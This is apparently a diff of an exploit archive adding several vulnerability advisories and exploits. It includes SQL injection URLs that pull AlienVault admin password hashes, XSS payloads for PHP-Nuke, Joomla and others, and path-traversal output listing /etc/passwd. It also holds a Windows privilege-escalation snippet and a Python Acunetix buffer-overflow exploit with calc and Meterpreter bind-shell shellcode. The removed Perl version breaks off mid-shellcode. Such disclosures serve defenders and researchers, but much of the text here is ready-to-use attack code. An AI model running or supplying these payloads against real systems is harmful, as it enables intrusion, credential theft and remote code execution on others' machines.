+mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
+uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
+operator:x:11:0:operator:/root:/sbin/nologin
+games:x:12:100:games:/usr/games:/sbin/nologin
+gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
+ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
+nobody:x:99:99:Nobody:/:/sbin/nologin
+vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
+ntp:x:38:38::/etc/ntp:/sbin/nologin
+saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
+postfix:x:89:89::/var/spool/postfix:/sbin/nologin
+apache:x:48:48:Apache:/var/www:/sbin/nologin
+sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
+ldap:x:55:55:LDAP User:/var/lib/ldap:/sbin/nologin
+dhcpd:x:177:177:DHCP server:/:/sbin/nologin
+tcpdump:x:72:72::/:/sbin/nologin
+{"local":{"STATUS":["0"],"MESSAGE":["Error code 4, Bad password or
+login"],"PARAM2":[""],"PARAM3":[null],"LAST":[1],"sessnum":[null],"transnum":[n
+ull]}}
+
+Furthermore, the identified vulnerability can be also exploited to
+execute arbitrary PHP code/system commands by including files that
+contain specially crafted user input.
+
+
+Vulnerable / tested versions:
+-----------------------------
+The vulnerability has been verified to exist in the 10.2.7 version of the WD
+Arkeia virtual appliance.
+
+According to the vendor all Arkeia Network Backup releases (ASA/APA/AVA) since
+7.0.3 are affected.
+
+
+Vendor contact timeline:
+------------------------
+2014-03-13: Contacting vendor through support@arkeia.com
+2014-03-14: Vendor confirms the vulnerability.
+2014-03-17: Vendor provides a quick fix and a release schedule.
+2014-04-21: Vendor releases a fixed version
+2014-04-23: SEC Consult releases a coordinated security advisory.
+
+
+Solution:
+---------
+Update to the most recent version (10.2.9) of Arkeia Network Backup.
+
+More information can be found at:
+http://wiki.arkeia.com/index.php/Path_Traversal_Remote_Code_Execution
+
+
+Workaround:
+-----------
+
+
+Advisory URL:
+-------------
+https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
+
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+SEC Consult Vulnerability Lab
+
+SEC Consult
+Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius
+
+Headquarter:
+Mooslackengasse 17, 1190 Vienna, Austria
+Phone:   +43 1 8903043 0
+Fax:     +43 1 8903043 15
+
+Mail: research at sec-consult dot com
+Web: https://www.sec-consult.com
+Blog: http://blog.sec-consult.com
+Twitter: https://twitter.com/sec_consult
+
+Interested to work with the experts of SEC Consult?
+Write to career@sec-consult.com
+
+EOF M. Lucinskij / @2014
\ No newline at end of file
diff --git a/platforms/php/webapps/33006.txt b/platforms/php/webapps/33006.txt
new file mode 100755
index 000000000..732b85aa7
--- /dev/null
+++ b/platforms/php/webapps/33006.txt
@@ -0,0 +1,73 @@
+AlienVault 4.3.1 Unauthenticated SQL Injection
+Vulnerability Type: SQL Injection
+Reporter: Sasha Zivojinovic
+Company: Gotham Digital Science
+Affected Software: AlienVault 4.3.1
+
+Severity: Critical
+
+=========================================================== 
+Summary 
+===========================================================
+
+A number of SQL injection vectors were identified within AlienVault (AV) 4.3.1 components. The “Geolocation Graph” and “Radar Access Control” AV components were found to accept HTTP request parameters that are concatenated without filtering or validation. These parameters are then passed as SQL queries which exposes the application to SQL Injection. This issue can be exploited by any unauthenticated users who have access to the AV web application. In addition the effective MySQL user was found to be “root” which allows attackers to leverage the identified issues into attacks against the AV host system.
+
+=========================================================== 
+Technical Details 
+===========================================================
+
+The ‘date_from’ and ‘date_to’ parameters passed to the ‘graph_geoloc.php’ page, the ‘date_from’ and ‘date_to’ parameters passed to the ‘radar-iso27001-A11AccessControl-pot.php’ page and the “user” parameter passed to the “graph_geoloc2.php” page are vulnerable to SQL injection attacks. These parameters were found to evaluate any SQL statements passed to them via a HTTP GET request.
+
+PHP functions “whereYM” and “getSourceLocalSSIYear” in source file “/var/www/geoloc/include/data_functions.inc” do not filter or validate user supplied input when constructing dynamic SQL queries. Attackers can inject arbitrary SQL statements that will be evaluated on the underlying MySQL server.
+
+Due to time limitations it has not been possible to locate the causes of the other identified vectors.
+
+
+Extending the attack:
+
+An attacker can retrieve various AV credentials including the MySQL connection string by querying the “alienvault.config” database table or by querying the “/etc/ossim/idm/config.xml” file through MySQL file access methods such as “LOAD_FILE”. Almost all credentials used by AV are equivalent so retrieving the credentials for the nessus user will also reveal the credentials for the SQL server and other components. These credentials are stored in plain-text within the database. By querying the “alienvault.users” table the attacker can retrieve the unsalted MD5 password hashes for administrative users. These hashed credentials are equivalent to the SSH credentials for the same users. Once these credentials have been retrieved and cracked an attacker can bypass the restrictions present in the SQL injection vector and perform arbitrary system or SQL queries by connecting directly to the AV host via SSH and using the local MySQL client to connect to the MySQL server.
+
+
+Cross Site Scripting (XSS):
+
+In addition the presence of MySQL errors presents an opportunity for reflected XSS attacks as the MySQL server does not filter responses when returning errors to the application user.
+
+
+===========================================================
+Proof-of-Concept Exploit 
+===========================================================
+
+https://127.0.0.1/geoloc/graph_geoloc.php?date_from=2013-07-01’%20union%20all%20select(SLEEP(10)),2—%20-&date_to=2013-07-30
+The integer value passed as a parameter to the “SLEEP” function can be increased or decreased to validate this finding.
+
+Error based evaluation can be used to return the MySQL version as per the following examples:
+
+https://127.0.0.1/geoloc/graph_geoloc2.php?year=2007&user=dsdds’%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,(1)and(select+1+from(select+count(*),concat((select+@@version),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a);—%20-
+https://127.0.0.1/geoloc/graph_geoloc.php?date_from=2013-07-01’%20union%20all%20select+(1)and(select+1+from(select+count(*),concat((select+@@version),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a),2—%20-&date_to=2013-07-30
+https://127.0.0.1/geoloc/graph_geoloc.php?date_from=2013-07-01&date_to=2013-07-30’%20union%20all%20select+(1)and(select+1+from(select+count(*),concat((select+@@version),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a),2—%20-
+https://127.0.0.1/RadarReport/radar-iso27001-A11AccessControl-pot.php?date_from=2&date_to=2’%20union%20all%20select+(1)and(select+1+from(select+count(*),concat((select+@@version),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a),2—%20-
+https://127.0.0.1/RadarReport/radar-iso27001-A11AccessControl-pot.php?date_from=2’%20union%20all%20select+(1)and(select+1+from(select+count(*),concat((select+@@version),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a),2—%20-&date_to=2
+https://127.0.0.1/RadarReport/radar-iso27001-A11AccessControl-pot.php?date_from=2’%20union%20all%20select+(1)and(select+1+from(select+count(*),concat((concat(0x3c7363726970743e616c6572742822,’database%20version:’,@@version,0x22293c2f7363726970743e)),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a),2—%20-&date_to=2
+Response:
+
+Duplicate entry ‘5.5.29-29.41’ for key ‘group_key’
+Pulling “admin” user password hashes:
+
+https://127.0.0.1/RadarReport/radar-iso27001-A11AccessControl-pot.php?date_from=2’%20union%20all%20select+(1)and(select+1+from(select+count(*),concat((select pass from alienvault.users where login=’admin’),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a),2—%20-&date_to=2
+
+Cross Site Scripting:
+
+The following examples demonstrate the use of unfiltered MySQL errors as an XSS vector:
+
+Vanilla XSS
+
+https://127.0.0.1/geoloc/graph_geoloc.php?date_from=2013-07-01’%20union%20select%200”<script>alert(‘GDS’)</script>,2%20—%20-&date_to=2013-07-30
+ASCII Encoded XSS Variant (useful in bypassing application layer filters)
+
+https://127.0.0.1/geoloc/graph_geoloc.php?date_from=2013-07-01’%20union%20select%200x27223e3c7363726970743e616c6572742831293c2f7363726970743e,2%20—%20-&date_to=2013-07-30
+
+===========================================================
+Recommendation 
+===========================================================
+
+AlienVault deployments should be upgraded to the latest stable version. The issues documented in this disclosure have been remediated in AlienVault 4.3.2.
\ No newline at end of file
diff --git a/platforms/php/webapps/33008.txt b/platforms/php/webapps/33008.txt
new file mode 100755
index 000000000..ea95002fb
--- /dev/null
+++ b/platforms/php/webapps/33008.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/35071/info
+
+LxBlog is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+The following example URIs are available:
+
+http://www.example.com/user_index.php?action=tag&job=modify&type=blog k LEFT JOIN pw_user i ON 1=1 WHERE i.uid =1 AND
+if((ASCII(SUBSTRING(password,1,1))>0),sleep(10),1)/*&item_type[]=blog k LEFT JOIN pw_user i ON 1=1 WHERE i.uid =1 AND
+if((ASCII(SUBSTRING(password,1,1))>0),sleep(10),1)/*
+
+http://www.example.com/user_index.php?action=tag&job=modify&type=[XSS]&item_type[]=[XSS] 
\ No newline at end of file
diff --git a/platforms/php/webapps/33011.txt b/platforms/php/webapps/33011.txt
new file mode 100755
index 000000000..4bf80c54e
--- /dev/null
+++ b/platforms/php/webapps/33011.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/35117/info
+
+PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+PHP-Nuke 8.0.0 is vulnerable; other versions may also be affected.
+
+The following sample request is available:
+
+GET http://www.example.com/PHP-Nuke-8.0/index.php HTTP/1.0
+Accept: */*
+referer: '+IF(False,'',SLEEP(5))+' 
\ No newline at end of file
diff --git a/platforms/php/webapps/33013.txt b/platforms/php/webapps/33013.txt
new file mode 100755
index 000000000..ea15e4391
--- /dev/null
+++ b/platforms/php/webapps/33013.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/35124/info
+
+Vanilla is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Versions prior to Vanilla 1.1.8 are vulnerable. 
+
+http://www.example.com/ajax/updatecheck.php?PostBackKey=1&ExtensionKey=1&RequestName=1<script>alert(123)</script>
\ No newline at end of file
diff --git a/platforms/php/webapps/33014.txt b/platforms/php/webapps/33014.txt
new file mode 100755
index 000000000..2b28b3566
--- /dev/null
+++ b/platforms/php/webapps/33014.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/35140/info
+
+Achievo is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Achievo 1.3.4 is vulnerable; other versions may also be affected.
+
+http://www.example.com/achievo/index.php?"><script>alert(0)</script>
+http://www.example.com/achievo/dispatch.php?atknodetype=pim.pim&atkaction=<script>alert(document.cookie)</script>
+
diff --git a/platforms/php/webapps/33021.txt b/platforms/php/webapps/33021.txt
new file mode 100755
index 000000000..7dd5b9b1e
--- /dev/null
+++ b/platforms/php/webapps/33021.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/35180/info
+
+PHP-Nuke is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+PHP-Nuke 8.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/modules.php?name=Downloads&d_op=search&query=&#039;&#039;;!--"[script]alert(document.cookie)[/script]
\ No newline at end of file
diff --git a/platforms/php/webapps/33022.txt b/platforms/php/webapps/33022.txt
new file mode 100755
index 000000000..fbfdbd530
--- /dev/null
+++ b/platforms/php/webapps/33022.txt
@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/35189/info
+
+
+Joomla! is prone to multiple cross-site scripting and HTML-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied input. These issues affect the 'com_user' component, the 'JA_Purity' template, and the administrative panel in the 'Site client' subproject of the application.
+
+An attacker can exploit these issues to steal cookie-based authentication credentials and launch other attacks.
+
+Versions prior to Joomla!1.5.11 are vulnerable. 
+
+http://www.example.com/path/?theme_header=%22%3E%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E
+http://www.example.com/path/?theme_background=%22%3E%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E
+http://www.example.com/path/?theme_elements=%22%3E%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E
+http://www.example.com/path/?logoType=1&logoText=%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E
+http://www.example.com/path/?logoType=1&sloganText=%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E
+http://www.example.com/path/?excludeModules=%27;alert(8);%20var%20b=%27
+http://www.example.com/path/?rightCollapseDefault=%27;alert(8);%20var%20b=%27
+http://www.example.com/path/?ja_font=%22%3E%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E
diff --git a/platforms/windows/local/33012.c b/platforms/windows/local/33012.c
new file mode 100755
index 000000000..c561ef8a6
--- /dev/null
+++ b/platforms/windows/local/33012.c
@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/35120/info
+
+Microsoft Windows is prone to a local privilege-escalation vulnerability.
+
+Attackers may exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will facilitate the complete compromise of affected computers. Failed exploit attempts will result in a denial-of-service condition. 
+
+#include <windows.h>
+int main()
+{
+ WCHAR c[1000] = {0};
+ memset(c, ?c?, 1000);
+ SystemParametersInfo(SPI_SETDESKWALLPAPER, 0, (PVOID)c, 0);
+
+ WCHAR b[1000] = {0};
+ SystemParametersInfo(SPI_GETDESKWALLPAPER, 1000, (PVOID)b, 0);
+ return 0;
+}
\ No newline at end of file
diff --git a/platforms/windows/remote/32997.pl b/platforms/windows/remote/32997.pl
index 67d635781..9da984e1e 100755
--- a/platforms/windows/remote/32997.pl
+++ b/platforms/windows/remote/32997.pl
@@ -1,81 +1,150 @@
-# Exploit Title: Acunetix Stack Based overflow
-# Date: 24/04/14
-# Exploit Author: Danor Cohen (An7i) - http://an7isec.blogspot.co.il/2014/04/pown-noobs-acunetix-0day.html
-# Vendor Homepage: http://www.acunetix.com/
-# Software Link: http://www.acunetix.com/vulnerability-scanner/download/
-# Version: 8 build 20120704
-# Tested on: XP
+#!/usr/bin/python
+# Title: Acunetix Web Vulnerability Scanner Buffer Overflow Exploit
+# Version: 8
+# Build: 20120704
+# Tested on: Windows XP SP2 en
+# Vendor: http://www.acunetix.com/
+# Original Advisory: http://an7isec.blogspot.co.il/2014/04/pown-noobs-acunetix-0day.html
+# Exploit-Author: Osanda Malith 
+# Follow @OsandaMalith
+# Exploit write-up: http://osandamalith.wordpress.com/2014/04/24/pwning-script-kiddies-acunetix-buffer-overflow/
+# /!\ Author is not responsible for any damage you cause
+# This POC is for educational purposes only
+# Video: https://www.youtube.com/watch?v=RHaMx8K1GeM
+# CVE: CVE-2014-2994
+'''
+Host the generated file in a server. The victim should select the external host. Otherwise we cannot trigger
+the vulnerability.
+'''
+print ('[~] Acunetix Web Vulnerability Scanner Buffer Overflow Exploit\n')
+while True:
+	try:
+		choice = int(raw_input("[?] Choose your payload:\n1. Calculator\n2. Bind Shell\n"))
+	except ValueError:
+		print "[!] Enter only a number"
+		continue
+		
+	if choice == 1:
+		shellcode =  ""
+		shellcode += "\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
+		shellcode += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
+		shellcode += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
+		shellcode += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+		shellcode += "\x49\x6c\x6d\x38\x6e\x69\x75\x50\x73\x30\x77\x70\x63"
+		shellcode += "\x50\x6f\x79\x68\x65\x30\x31\x49\x42\x63\x54\x4c\x4b"
+		shellcode += "\x31\x42\x46\x50\x4c\x4b\x46\x32\x44\x4c\x6e\x6b\x70"
+		shellcode += "\x52\x46\x74\x4c\x4b\x64\x32\x34\x68\x64\x4f\x4e\x57"
+		shellcode += "\x30\x4a\x35\x76\x66\x51\x69\x6f\x64\x71\x69\x50\x6e"
+		shellcode += "\x4c\x65\x6c\x71\x71\x61\x6c\x77\x72\x74\x6c\x31\x30"
+		shellcode += "\x69\x51\x4a\x6f\x54\x4d\x53\x31\x69\x57\x39\x72\x58"
+		shellcode += "\x70\x71\x42\x53\x67\x6e\x6b\x63\x62\x74\x50\x6e\x6b"
+		shellcode += "\x53\x72\x57\x4c\x77\x71\x48\x50\x6c\x4b\x37\x30\x31"
+		shellcode += "\x68\x4e\x65\x4b\x70\x43\x44\x31\x5a\x36\x61\x58\x50"
+		shellcode += "\x62\x70\x6c\x4b\x31\x58\x34\x58\x6e\x6b\x42\x78\x77"
+		shellcode += "\x50\x36\x61\x38\x53\x6b\x53\x67\x4c\x57\x39\x4e\x6b"
+		shellcode += "\x77\x44\x4e\x6b\x47\x71\x69\x46\x34\x71\x49\x6f\x64"
+		shellcode += "\x71\x39\x50\x6c\x6c\x6f\x31\x7a\x6f\x46\x6d\x47\x71"
+		shellcode += "\x69\x57\x35\x68\x59\x70\x71\x65\x49\x64\x57\x73\x33"
+		shellcode += "\x4d\x6a\x58\x35\x6b\x43\x4d\x67\x54\x31\x65\x6d\x32"
+		shellcode += "\x61\x48\x6c\x4b\x51\x48\x34\x64\x66\x61\x6e\x33\x35"
+		shellcode += "\x36\x6c\x4b\x66\x6c\x30\x4b\x4e\x6b\x43\x68\x45\x4c"
+		shellcode += "\x33\x31\x4a\x73\x4c\x4b\x53\x34\x4e\x6b\x53\x31\x4e"
+		shellcode += "\x30\x4c\x49\x37\x34\x54\x64\x54\x64\x73\x6b\x31\x4b"
+		shellcode += "\x31\x71\x52\x79\x42\x7a\x53\x61\x79\x6f\x69\x70\x42"
+		shellcode += "\x78\x63\x6f\x43\x6a\x6c\x4b\x77\x62\x7a\x4b\x6c\x46"
+		shellcode += "\x53\x6d\x70\x6a\x57\x71\x4c\x4d\x4e\x65\x6e\x59\x53"
+		shellcode += "\x30\x45\x50\x47\x70\x52\x70\x52\x48\x44\x71\x6e\x6b"
+		shellcode += "\x42\x4f\x4b\x37\x6b\x4f\x78\x55\x4d\x6b\x6b\x50\x45"
+		shellcode += "\x4d\x56\x4a\x47\x7a\x50\x68\x4f\x56\x4e\x75\x6f\x4d"
+		shellcode += "\x4f\x6d\x59\x6f\x68\x55\x77\x4c\x46\x66\x51\x6c\x65"
+		shellcode += "\x5a\x6d\x50\x6b\x4b\x4b\x50\x44\x35\x56\x65\x6f\x4b"
+		shellcode += "\x71\x57\x64\x53\x54\x32\x42\x4f\x53\x5a\x33\x30\x61"
+		shellcode += "\x43\x49\x6f\x68\x55\x33\x53\x33\x51\x52\x4c\x43\x53"
+		shellcode += "\x65\x50\x41\x41"
+		break
 
-#This exploit generates HTML file, if this HTML will be scanned with ACUNETIX, shell will be executed.
- 
-my $file= "index.html";
-my $HTMLHeader1 = "<html>\r\n";
-my $HTMLHeader2 = "\r\n</html>";
-my $IMGheader1 = "<img style=\"opacity:0.0;filter:alpha(opacity=0);\" src=http://";
-my $IMGheader2 = "><br>\n";
+	elif choice == 2:
+		# Modify this part with your own custom shellcode
+		# msfpayload windows/meterpreter/bind_tcp EXITFUNC=thread LPORT=4444 R| msfencode -e x86/alpha_mixed -t python shellcodeferRegister=ESP
+		shellcode =  ""
+		shellcode += "\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
+		shellcode += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
+		shellcode += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
+		shellcode += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+		shellcode += "\x69\x6c\x4b\x58\x6c\x49\x65\x50\x73\x30\x73\x30\x31"
+		shellcode += "\x70\x6e\x69\x48\x65\x70\x31\x59\x42\x55\x34\x4c\x4b"
+		shellcode += "\x42\x72\x76\x50\x6c\x4b\x73\x62\x76\x6c\x4c\x4b\x53"
+		shellcode += "\x62\x57\x64\x6e\x6b\x63\x42\x34\x68\x66\x6f\x48\x37"
+		shellcode += "\x30\x4a\x54\x66\x55\x61\x79\x6f\x55\x61\x4b\x70\x4c"
+		shellcode += "\x6c\x35\x6c\x30\x61\x33\x4c\x75\x52\x64\x6c\x67\x50"
+		shellcode += "\x6f\x31\x5a\x6f\x54\x4d\x47\x71\x48\x47\x6b\x52\x38"
+		shellcode += "\x70\x61\x42\x46\x37\x6e\x6b\x32\x72\x66\x70\x6e\x6b"
+		shellcode += "\x73\x72\x75\x6c\x73\x31\x4e\x30\x6e\x6b\x71\x50\x43"
+		shellcode += "\x48\x4b\x35\x49\x50\x61\x64\x72\x6a\x33\x31\x78\x50"
+		shellcode += "\x76\x30\x4c\x4b\x77\x38\x35\x48\x6e\x6b\x53\x68\x61"
+		shellcode += "\x30\x65\x51\x5a\x73\x69\x73\x77\x4c\x50\x49\x4e\x6b"
+		shellcode += "\x56\x54\x6e\x6b\x45\x51\x69\x46\x75\x61\x6b\x4f\x66"
+		shellcode += "\x51\x49\x50\x6c\x6c\x4b\x71\x78\x4f\x56\x6d\x35\x51"
+		shellcode += "\x4a\x67\x50\x38\x59\x70\x61\x65\x39\x64\x67\x73\x31"
+		shellcode += "\x6d\x6a\x58\x45\x6b\x43\x4d\x76\x44\x50\x75\x49\x72"
+		shellcode += "\x52\x78\x6e\x6b\x61\x48\x46\x44\x43\x31\x68\x53\x45"
+		shellcode += "\x36\x4e\x6b\x34\x4c\x42\x6b\x6e\x6b\x73\x68\x35\x4c"
+		shellcode += "\x57\x71\x6b\x63\x4c\x4b\x53\x34\x6c\x4b\x43\x31\x4e"
+		shellcode += "\x30\x4e\x69\x32\x64\x47\x54\x56\x44\x73\x6b\x61\x4b"
+		shellcode += "\x75\x31\x31\x49\x72\x7a\x76\x31\x59\x6f\x59\x70\x61"
+		shellcode += "\x48\x51\x4f\x31\x4a\x6c\x4b\x52\x32\x78\x6b\x6e\x66"
+		shellcode += "\x43\x6d\x42\x48\x67\x43\x45\x62\x37\x70\x63\x30\x72"
+		shellcode += "\x48\x42\x57\x32\x53\x76\x52\x31\x4f\x42\x74\x50\x68"
+		shellcode += "\x52\x6c\x64\x37\x64\x66\x44\x47\x39\x6f\x69\x45\x4d"
+		shellcode += "\x68\x5a\x30\x65\x51\x57\x70\x63\x30\x76\x49\x59\x54"
+		shellcode += "\x31\x44\x52\x70\x45\x38\x64\x69\x4f\x70\x50\x6b\x57"
+		shellcode += "\x70\x59\x6f\x7a\x75\x52\x70\x52\x70\x32\x70\x52\x70"
+		shellcode += "\x47\x30\x30\x50\x67\x30\x66\x30\x63\x58\x48\x6a\x54"
+		shellcode += "\x4f\x49\x4f\x69\x70\x79\x6f\x4e\x35\x4c\x57\x45\x61"
+		shellcode += "\x6b\x6b\x51\x43\x73\x58\x73\x32\x57\x70\x34\x51\x73"
+		shellcode += "\x6c\x6f\x79\x4a\x46\x42\x4a\x76\x70\x46\x36\x50\x57"
+		shellcode += "\x71\x78\x7a\x62\x4b\x6b\x70\x37\x72\x47\x6b\x4f\x48"
+		shellcode += "\x55\x62\x73\x51\x47\x72\x48\x4c\x77\x78\x69\x47\x48"
+		shellcode += "\x4b\x4f\x69\x6f\x48\x55\x30\x53\x52\x73\x53\x67\x45"
+		shellcode += "\x38\x62\x54\x5a\x4c\x67\x4b\x6d\x31\x69\x6f\x5a\x75"
+		shellcode += "\x72\x77\x6c\x57\x62\x48\x54\x35\x50\x6e\x32\x6d\x35"
+		shellcode += "\x31\x4b\x4f\x69\x45\x61\x7a\x77\x70\x32\x4a\x73\x34"
+		shellcode += "\x62\x76\x61\x47\x70\x68\x63\x32\x78\x59\x4a\x68\x31"
+		shellcode += "\x4f\x49\x6f\x48\x55\x6e\x6b\x46\x56\x51\x7a\x71\x50"
+		shellcode += "\x62\x48\x65\x50\x46\x70\x63\x30\x43\x30\x31\x46\x32"
+		shellcode += "\x4a\x55\x50\x71\x78\x31\x48\x49\x34\x66\x33\x6b\x55"
+		shellcode += "\x59\x6f\x4e\x35\x4f\x63\x72\x73\x71\x7a\x37\x70\x30"
+		shellcode += "\x56\x70\x53\x71\x47\x45\x38\x74\x42\x38\x59\x6f\x38"
+		shellcode += "\x33\x6f\x49\x6f\x69\x45\x67\x71\x79\x53\x76\x49\x6b"
+		shellcode += "\x76\x6f\x75\x48\x76\x62\x55\x58\x6c\x49\x53\x41\x41"
 
-my $DomainName1 = "XSS";
-my $DomainName2 = "CSRF";
-my $DomainName3 = "DeepScan";
-my $DomainName4 = "NetworkScan";
-my $DomainName5 = "DenialOfService";
-my $GeneralDotPadding = "." x 190;
+		print "[+] Connect on port 4444"
+		break
+	else:
+		print "[-] Invalid Choice"
+		continue
 
-my $ExploitDomain = "SQLInjection";
-my $DotPadding = "." x (202-length($ExploitDomain));
-my $Padding1 = "A"x66;
-my $Padding2 = "B"x4;
-my $FlowCorrector = "500f"; #0x66303035 : readable memory location for fixing the flow
-my $EIPOverWrite = "]Qy~"; #0x7e79515d (JMP ESP from SXS.DLL).
+head = ("<html>\
+		<body>\
+		<center><h1>Scan This Site and Get Pwned :)</h1></center><br>")
+junk = ("\
+		<a href= \"http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
+		AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
+		AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
+		AAAAAAA")
+edx = "500f"
+junk2 = "BBBB"
+# jmp esp | asciiprint,ascii,alphanum {PAGE_EXECUTE_READ} [WINHTTP.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.2180 (C:\WINDOWS\system32\WINHTTP.dll)
+eip = "\x49\x63\x52\x4d"
 
-# windows/exec - 461 bytes
-# http://www.metasploit.com
-# Encoder: x86/alpha_upper
-# VERBOSE=false, PrependMigrate=false, EXITFUNC=thread,
-# CMD=calc.exe
-my $shellcode2 =
-"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a" .
-"\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48" .
-"\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51" .
-"\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43" .
-"\x4a\x4a\x49\x4b\x4c\x5a\x48\x4b\x39\x33\x30\x45\x50\x53" .
-"\x30\x33\x50\x4c\x49\x4a\x45\x46\x51\x48\x52\x52\x44\x4c" .
-"\x4b\x36\x32\x50\x30\x4c\x4b\x51\x42\x34\x4c\x4c\x4b\x51" .
-"\x42\x35\x44\x4c\x4b\x52\x52\x37\x58\x54\x4f\x48\x37\x51" .
-"\x5a\x57\x56\x50\x31\x4b\x4f\x46\x51\x4f\x30\x4e\x4c\x37" .
-"\x4c\x45\x31\x33\x4c\x45\x52\x36\x4c\x47\x50\x59\x51\x58" .
-"\x4f\x54\x4d\x53\x31\x49\x57\x4d\x32\x4c\x30\x50\x52\x46" .
-"\x37\x4c\x4b\x31\x42\x44\x50\x4c\x4b\x30\x42\x57\x4c\x45" .
-"\x51\x4e\x30\x4c\x4b\x57\x30\x34\x38\x4b\x35\x59\x50\x42" .
-"\x54\x31\x5a\x53\x31\x48\x50\x36\x30\x4c\x4b\x37\x38\x52" .
-"\x38\x4c\x4b\x46\x38\x51\x30\x43\x31\x49\x43\x4a\x43\x47" .
-"\x4c\x47\x39\x4c\x4b\x56\x54\x4c\x4b\x45\x51\x48\x56\x36" .
-"\x51\x4b\x4f\x56\x51\x39\x50\x4e\x4c\x39\x51\x38\x4f\x54" .
-"\x4d\x43\x31\x49\x57\x56\x58\x4b\x50\x43\x45\x4a\x54\x35" .
-"\x53\x53\x4d\x4b\x48\x57\x4b\x43\x4d\x57\x54\x34\x35\x5a" .
-"\x42\x31\x48\x4c\x4b\x56\x38\x37\x54\x33\x31\x48\x53\x32" .
-"\x46\x4c\x4b\x34\x4c\x50\x4b\x4c\x4b\x56\x38\x35\x4c\x43" .
-"\x31\x58\x53\x4c\x4b\x43\x34\x4c\x4b\x43\x31\x4e\x30\x4b" .
-"\x39\x51\x54\x31\x34\x56\x44\x51\x4b\x51\x4b\x43\x51\x36" .
-"\x39\x51\x4a\x30\x51\x4b\x4f\x4b\x50\x50\x58\x51\x4f\x30" .
-"\x5a\x4c\x4b\x54\x52\x4a\x4b\x4b\x36\x31\x4d\x33\x5a\x53" .
-"\x31\x4c\x4d\x4b\x35\x4f\x49\x55\x50\x35\x50\x35\x50\x46" .
